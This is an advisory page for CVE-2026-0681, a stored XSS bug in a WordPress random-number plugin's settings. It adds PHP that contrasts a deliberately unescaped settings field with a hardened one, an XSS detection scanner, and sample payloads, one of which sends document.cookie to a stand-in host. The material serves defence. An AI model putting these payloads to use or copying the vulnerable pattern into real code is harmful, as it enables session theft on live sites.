CVE-2026-0681
Stored XSS in WordPress Extended RNG Plugin Settings
Publication date: 2026-02-04
Last updated on: 2026-02-04
Assigner: Wordfence
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wordfence | extended_random_number_generator | up to and including 1.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
The Extended Random Number Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the plugin settings in all versions up to and including 1.1. This vulnerability arises due to insufficient input sanitization and output escaping.
Authenticated attackers with administrator-level access can exploit this vulnerability to inject arbitrary web scripts into pages. These scripts will execute whenever a user accesses the injected page.
This vulnerability only affects multi-site WordPress installations and installations where the unfiltered_html capability has been disabled.
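The settings-page pattern behind this CWE-79 finding, shown as an added illustration that is not the Extended Random Number Generator plugin's own code. The option name `ext_rng_settings`, the field `label`, and the stand-in versions of `esc_attr()` and `sanitize_text_field()` are assumptions made so the file runs under plain `php`; inside WordPress the core functions are used instead.

```php
<?php
// Added illustration of the settings-page pattern behind CWE-79; this is not
// the Extended Random Number Generator plugin's code. The option name
// ext_rng_settings and the field 'label' are assumptions for the example.

// Stand-ins so the file runs under plain `php`; inside WordPress the real core
// functions exist and these blocks are skipped. Both are approximations.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $s ) {
        return htmlspecialchars( (string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_text_field' ) ) {
    // Core additionally drops script/style contents and octet sequences; this
    // approximation strips tags and control characters, then trims.
    function sanitize_text_field( $s ) {
        $s = strip_tags( (string) $s );
        $s = preg_replace( '/[\x00-\x1F\x7F]/', '', $s );
        return trim( $s );
    }
}

// --- Vulnerable pattern ---------------------------------------------------
// The submitted value is stored unchanged and later echoed into an attribute
// without escaping. An administrator who lacks unfiltered_html can still reach
// this form, and core's KSES filtering does not apply to plugin options, so the
// plugin itself must neutralize the input.
function ext_rng_store_vulnerable( array $post ) {
    return array( 'label' => isset( $post['ext_rng_label'] ) ? $post['ext_rng_label'] : '' );
}

function ext_rng_render_vulnerable( array $opts ) {
    return '<input type="text" name="ext_rng_label" value="' . $opts['label'] . '">';
}

// --- Hardened pattern -----------------------------------------------------
// Sanitize on the way in (what a register_setting() sanitize_callback does)
// and escape for the attribute context on the way out. Both are needed:
// input sanitization does not cover a value that reached the database by
// another path, and output escaping does not clean what is already stored.
// In real plugin code the $_POST value is passed through wp_unslash() first,
// because WordPress adds slashes to request data.
function ext_rng_sanitize( array $input ) {
    return array(
        'label' => isset( $input['label'] ) ? sanitize_text_field( $input['label'] ) : '',
    );
}

function ext_rng_store_hardened( array $post ) {
    $raw = array( 'label' => isset( $post['ext_rng_label'] ) ? $post['ext_rng_label'] : '' );
    return ext_rng_sanitize( $raw );
}

function ext_rng_render_hardened( array $opts ) {
    return '<input type="text" name="ext_rng_label" value="' . esc_attr( $opts['label'] ) . '">';
}

// --- Demo with a constructed payload --------------------------------------
$post = array( 'ext_rng_label' => '"><script>alert(document.cookie)</script>' );

echo "vulnerable: " . ext_rng_render_vulnerable( ext_rng_store_vulnerable( $post ) ) . "\n";
// The leading quote closes the value attribute and the <script> element is
// emitted verbatim into the settings page.

echo "hardened:   " . ext_rng_render_hardened( ext_rng_store_hardened( $post ) ) . "\n";
// The tags are stripped on save and the remaining quote and angle bracket are
// entity-encoded, so the value stays inside the attribute.
```

The hardened half is the shape of the fix for this class of bug: register the option with a sanitize callback so every write path goes through `sanitize_text_field()` (or `wp_kses_post()` when limited markup is intended), and escape with `esc_attr()` or `esc_html()` at the exact point and context where the value is printed.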
How can this vulnerability impact me?
This vulnerability can allow an attacker with administrator access to inject malicious scripts into the website's pages. These scripts can execute in the context of users visiting the affected pages.
Potential impacts include theft of user credentials, session hijacking, defacement of the website, or distribution of malware to visitors.
Because exploitation requires administrator-level access, the practical risk is confined to deployments where administrators are deliberately denied the unfiltered_html capability. On a multisite network, individual site administrators do not hold unfiltered_html (only super admins do), so this bug lets a site administrator store script that executes in the browser of a super admin or of any other user who views the affected page. On a single-site installation where administrators retain unfiltered_html, they can already publish arbitrary script, so the bug grants them nothing new.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves Stored Cross-Site Scripting (XSS) in the Extended Random Number Generator WordPress plugin settings, exploitable by authenticated administrators. Detection typically requires inspecting the plugin settings for injected scripts or monitoring HTTP responses for unexpected script content in pages served by multi-site installations or sites with unfiltered_html disabled.
Since the vulnerability concerns scripts stored in plugin settings, there is no network-level signature to match on. Instead, inspect the plugin's option values directly: on the main site they live in the wp_options table, and on a multisite network each additional site has its own wp_N_options table (where N is the blog ID). Look for script tags, inline event handlers (onerror=, onload=), javascript: URLs, or entity-encoded variants of these inside the stored settings, and check the rendered settings page and any front-end output that includes those values for unexpected script content.
No specific detection commands are provided in the available resources.
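An added scanner, not from the advisory or the plugin, that does the inspection described above over option rows: it unserializes array-valued settings the way WordPress stores them, walks every string leaf, entity-decodes it, and flags script-like content. The option names and the sample rows are constructed for the example; in practice the rows come from `wp option list --format=json` or a `SELECT option_name, option_value FROM wp_options` export, repeated per `wp_N_options` table on multisite.

```php
<?php
// Added detection example; not from the advisory or the plugin. It inspects
// wp_options-shaped data for an injected settings payload. The option names
// and sample rows below are constructed.

$patterns = array(
    '/<\s*script\b/i',
    '/<\s*(iframe|object|embed|svg|math)\b/i',
    '/\bon[a-z]+\s*=/i',   // inline event handlers: onerror=, onload=, ...
    '/javascript\s*:/i',
);

// Recursively collect every string leaf of a (possibly nested) value, keyed by
// a path such as ext_rng_settings[suffix].
function ext_rng_leaves( $value, $path, array &$out ) {
    if ( is_array( $value ) ) {
        foreach ( $value as $k => $v ) {
            ext_rng_leaves( $v, $path . '[' . $k . ']', $out );
        }
    } elseif ( is_object( $value ) ) {
        ext_rng_leaves( (array) $value, $path, $out );
    } elseif ( is_string( $value ) ) {
        $out[ $path ] = $value;
    }
}

// WordPress stores array settings as PHP-serialized strings. Unserialize with
// object instantiation disabled so a crafted row cannot trigger __wakeup() or
// __destruct() on the scanning host; anything that fails stays a raw string.
function ext_rng_decode( $raw ) {
    if ( is_string( $raw ) && preg_match( '/^[aOsbidN][:;]/', $raw ) ) {
        $v = @unserialize( $raw, array( 'allowed_classes' => false ) );
        if ( $v !== false || $raw === 'b:0;' ) {
            return $v;
        }
    }
    return $raw;
}

// Returns one hit per suspicious leaf: option path, matching pattern, value.
function ext_rng_scan_options( array $rows, array $patterns ) {
    $hits = array();
    foreach ( $rows as $name => $raw ) {
        $leaves = array();
        ext_rng_leaves( ext_rng_decode( $raw ), $name, $leaves );
        foreach ( $leaves as $path => $text ) {
            // Decode entities first so &lt;script&gt; or &#106;avascript: hidden
            // in a setting is matched by the same patterns as the plain form.
            $probe = html_entity_decode( $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
            foreach ( $patterns as $re ) {
                if ( preg_match( $re, $probe ) ) {
                    $hits[] = array( 'option' => $path, 'pattern' => $re, 'value' => $text );
                    break;
                }
            }
        }
    }
    return $hits;
}

// Constructed sample rows in wp_options shape (option_name => option_value).
$rows = array(
    'blogname'            => 'Example Site',
    'siteurl'             => 'https://example.com',
    'ext_rng_settings'    => serialize( array(
        'label'  => 'Dice',
        'suffix' => '"><script>fetch("//evil.example/c?"+document.cookie)</script>',
    ) ),
    'ext_rng_legacy_note' => 'x&quot; onerror=&quot;alert(1)',
);

foreach ( ext_rng_scan_options( $rows, $patterns ) as $hit ) {
    printf( "%s matched %s: %s\n", $hit['option'], $hit['pattern'], $hit['value'] );
}
```

The patterns are heuristics and will flag legitimate values that happen to contain an `on...=` token; treat each hit as something to review by hand rather than an automatic verdict, and cross-check flagged options against the settings page that renders them.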
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include updating the Extended Random Number Generator plugin to a version later than 1.1 where the vulnerability is fixed, if such a version is available.
If an update is not available, restrict administrator access to trusted users only, especially on multi-site installations or sites where unfiltered_html is disabled, to prevent exploitation.
Additionally, review and sanitize plugin settings to remove any injected scripts and monitor for suspicious activity.